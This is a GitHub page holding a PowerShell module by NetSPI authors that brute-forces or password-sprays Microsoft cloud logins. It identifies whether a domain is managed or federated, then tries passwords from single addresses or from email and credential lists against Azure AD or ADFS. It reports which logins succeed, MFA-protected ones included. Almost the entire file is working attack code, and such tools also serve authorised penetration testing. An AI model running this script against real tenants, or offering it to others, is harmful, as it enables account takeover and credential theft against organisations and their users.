-
Notifications
You must be signed in to change notification settings - Fork 104
/
Invoke-ExternalDomainBruteforce.psm1
285 lines (218 loc) · 10.7 KB
/
Invoke-ExternalDomainBruteforce.psm1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
#requires -Modules AzureAD
<#
.SYNOPSIS
This script can be used to attempt user logins against federated/managed domains over the internet.
.DESCRIPTION
This script can be used to attempt authentication against federated/managed domains. Credentials are sent to Microsoft using the connect-msolservice PowerShell module. Successful usernames/passwords are then returned as a datatable.
.EXAMPLE
PS C:\> Invoke-ExternalDomainBruteforce -email [email protected] -password "Password123" -domain "test.com" | ft -AutoSize
Email Domain Password
----- ------ ----
[email protected] test.com Password123
.EXAMPLE
PS C:\> Invoke-ExternalDomainBruteforce -email [email protected] -password "Password123" -domain "test.com" -type "managed" | ft -AutoSize
Email Domain Password
----- ------ ----
[email protected] test.com Password123
.EXAMPLE
PS C:\> Invoke-ExternalDomainBruteforce -emails "C:\Temp\emails.txt" -password "Password123" -domain "test.com" | ft -AutoSize
Email Domain Password
----- ------ ----
[email protected] test.com Password123
[email protected] test.com Password123
.EXAMPLE
PS C:\> Invoke-ExternalDomainBruteforce -list "C:\Temp\email-password.csv" -domain "test.com" | ft -AutoSize
Email Domain Password
----- ------ ----
[email protected] test.com Password123
[email protected] test.com WeakPassword987
.NOTES
Author: Ryan Gandrud (@siegenapster), NetSPI - 2017
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2016
Contributors: Scott Sutherland (@_nullbind)
.LINK
https://blog.netspi.com/using-powershell-identify-federated-domains/
http://www.economyofmechanism.com/office365-authbypass.html
https://blogs.msdn.microsoft.com/besidethepoint/2012/10/17/request-adfs-security-token-with-powershell/
https://msdn.microsoft.com/en-us/library/jj151815.aspx
https://technet.microsoft.com/en-us/library/dn568015.aspx
#>
#Pulled from Karl Fosaaen's script at
#https://github.com/NetSPI/PowerShell/blob/master/Get-FederationEndpoint.ps1
function Get-FederationEndpoint{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$true,
HelpMessage="Domain name to get the authentication endpoint for.")]
[string]$domain
)
# "Test" Email
$email = "test@"+$domain
# Microsoft URL to get the JSON response from
$url = "https://login.microsoftonline.com/common/userrealm/?user="+$email+"&api-version=2.1&checkForMicrosoftAccount=true";
# Create data table to house results
$DomainTestResults = new-object system.data.datatable
$DomainTestResults.columns.add("Domain") | Out-Null
$DomainTestResults.columns.add("Type") | Out-Null
$DomainTestResults.columns.add("BrandName") | Out-Null
$DomainTestResults.columns.add("CMD") | Out-Null
try{
# Make the request
$JSON = Invoke-RestMethod -Uri $url
# Handle the Response
$NameSpaceType = $JSON[0].NameSpaceType
if ($NameSpaceType -eq "Managed"){
#Add data to the table
$DomainTestResults.Rows.Add($JSON[0].DomainName, "Managed", $JSON[0].FederationBrandName, "NA") | Out-Null
if ($cmd){
# Check if AzureAD module is installed
if (Get-Module -Name MsOnline){}
else{Write-Host "`n`t*Requires AzureAD PowerShell module to be installed and loaded - https://msdn.microsoft.com/en-us/library/jj151815.aspx"}
}
}
ElseIf ($NameSpaceType -eq "Federated"){
# Parse Stuff
$username = $email.Split("@")[0]
$domain = $JSON[0].DomainName
$ADFSBaseUri = [string]$JSON[0].AuthURL.Split("/")[0]+"//"+[string]$JSON[0].AuthURL.Split("/")[2]+"/"
$AppliesTo = $ADFSBaseUri+"adfs/services/trust/13/usernamemixed"
# Add data to the table
$DomainTestResults.Rows.Add($JSON[0].DomainName, "Federated", $JSON[0].FederationBrandName, $JSON[0].AuthURL) | Out-Null
}
Else{
# If the domain has no federation information available from Microsoft
$DomainTestResults.Rows.Add("NA", "NA", "NA", "NA") | Out-Null
}
}
catch{
Write-Host "`nThe Request out to Microsoft failed."
}
Return $DomainTestResults
}
function Invoke-ExternalDomainBruteforce{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$false,
HelpMessage="Email address to test password against.")]
[string]$email,
[Parameter(Mandatory=$false,
HelpMessage="File location containing a list of email addresses to test a password against. E.g. C:\temp\emails.txt")]
[string]$emails,
[Parameter(Mandatory=$false,
HelpMessage="Password to test against username(s).")]
[string]$password,
[Parameter(Mandatory=$true,
HelpMessage="Domain of users.")]
[string]$domain,
[Parameter(Mandatory=$false,
HelpMessage="File location of usernames and passwords, separated by a comma ([email protected],Password). E.g. C:\temp\user-pass.csv")]
[string]$userPass
)
if($userPass){
$Users = Get-Content $userPass
$UP = $true
}
elseif($emails){
$Users = Get-Content $emails
}
elseif($email) {
$Users = $email
}
else{Write-Host "Please provide an email address or a list of users."; break}
if (-Not $type) {
# Get-FederationEndpoint for type of domain
$info = Get-FederationEndpoint -domain $domain
$type = $info[1]
}
# Create data table to house results
$EmailTestResults = new-object system.data.datatable
$EmailTestResults.columns.add("Email") | Out-Null
$EmailTestResults.columns.add("Domain") | Out-Null
$EmailTestResults.columns.add("Password") | Out-Null
Write-Verbose "The domain type is $($type)"
if ($type -match "Managed" -or $type -match "NA") {
if ($type -eq "NA"){
Write-Host "Domain is neither Managed or Federated. Defaulting to using Managed authentication."
}
$Users | ForEach-Object {
# Checking for UserPass combo list
if ($UP){
$User,$password = $_.split(',',2)
}
else{
$User = $_
}
try{
# Make all errors terminating to get try/catch to work.
$ErrorActionPreference = "Stop";
# Setting up credential object
$PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
$Credential = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList $User, $PWord
Write-Verbose "Testing $($User) with password $($password)"
# Attempt to authenticate to Managed domain
#connect-msolservice -credential $Credential
Connect-AzureAD -Credential $Credential
# If no error is detected, authentication is successful
Write-Host "Authentication Successful: `t'$User' - "$password -ForegroundColor Green
$EmailTestResults.Rows.Add($User, $domain, $password) | Out-Null
# Keep track of the last successful authentication
$LastSuccessAuth = $User
}
catch{
# Blog writing mods
# if($user -match 'test'){Write-Host "Authentication Successful: `t'$User' - "$password -ForegroundColor Green;$EmailTestResults.Rows.Add($User, "N/A", $password) | Out-Null;$LastSuccessAuth = $User}
# else{Write-Host "Authentication Failure: `t'$User' - "$password -ForegroundColor Red}
if(($PSItem.ToString()) -like "*you must use multi-factor authentication*"){
Write-Host "Authentication Successful: `t'$User' - "$password "(MFA endabled)" -ForegroundColor Green
}
else{
Write-Host "Authentication Failure: `t'$User' - "$password -ForegroundColor Red
}
}
}
if($LastSuccessAuth){
Write-Host "`nWARNING: You still have an active session as "$LastSuccessAuth"`nAny actions against a Managed domain will take place as this user. You have been warned.`nTo close this session, please exit from your PowerShell session." -ForegroundColor Red}
}
ElseIf($type -match "Federated") {
$Users | ForEach-Object {
if ($UP){
$User,$password = $_.split(',',2)
}
else{
$User = $_
}
# Check if Invoke-ADFSSecurityTokenRequest is loaded
try {Get-Command -Name Invoke-ADFSSecurityTokenRequest -ErrorAction Stop | Out-Null}
catch{Write-Host `n'*Requires the command imported from here - https://gallery.technet.microsoft.com/scriptcenter/Invoke-ADFSSecurityTokenReq-09e9c90c' -ForegroundColor Red;break
}
# Parse the JSON URI into usable formats
$ADFSBaseUri = [string]$info[3].Split("/")[0]+"//"+[string]$info[3].Split("/")[2]+"/"
$AppliesTo = $ADFSBaseUri+"adfs/services/trust/13/usernamemixed"
Write-Verbose "Testing $($User) with password $($password)"
# Attempt to request a security token using username/password
try{
$ErrorActionPreference = "Stop";
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-ADFSSecurityTokenRequest -ClientCredentialType UserName -ADFSBaseUri "$ADFSBaseUri" -AppliesTo "$AppliesTo" -UserName "$User" -Password $password -Domain '$info[0]' -OutputType Token -SAMLVersion 2 -IgnoreCertificateErrors | Out-Null
$EmailTestResults.Rows.Add($User, $domain, $password) | Out-Null
Write-Host 'Authentication Successful: '$User' - '$password -ForegroundColor Green
}
catch{
# Blog writing mods
#if($user -match 'test'){Write-Host 'Authentication Successful: '$User' - '$password -ForegroundColor Green;$EmailTestResults.Rows.Add($User, $domain, $password) | Out-Null}
#else{Write-Host 'Authentication Failure: '$User' - '$password -ForegroundColor Red}
if(($PSItem.ToString()) -like "*you must use multi-factor authentication*"){
Write-Host "Authentication Successful: `t'$User' - "$password "(MFA endabled)" -ForegroundColor Green
}
else{
Write-Host "Authentication Failure: `t'$User' - "$password -ForegroundColor Red
}
}
}
Write-Host "`nAuthentication URL: "$info[3] -ForegroundColor Green
}
Else{
Write-Host "`nSomething has gone horribly wrong!`nIs your domain name correct?"
}
Return $EmailTestResults
}